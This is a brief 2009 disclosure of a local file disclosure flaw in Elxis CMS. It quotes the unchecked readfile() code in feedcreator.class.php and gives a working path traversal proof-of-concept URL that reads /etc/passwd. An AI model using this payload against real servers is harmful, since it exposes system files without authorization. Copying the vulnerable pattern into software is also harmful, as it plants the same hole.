Elxis CMS suffers from a local file disclosure vulnerability.
487987ab0b7cc4735c71bb9329c7870c89a23ef7e01c401143372c084829a48c
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#Elxis CMS Local File Disclosure Vulnerability
#Script Site : http://www.elxis.org
########################################################################
#
#Code : <?php
#
# line 639 Header("Content-Type: ".$this->contentType."; charset=".$this->encoding);
# line 640 Header("Content-Disposition: inline; filename=".basename($filename));
# line 641 readfile($filename, "r");
# line 642 die();
# ?>
#PoC : http://[target]/[path]/includes/feedcreator.class.php?filename=../../../../../../etc/passwd
#
#
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
[ Gorontalo / 2009 ]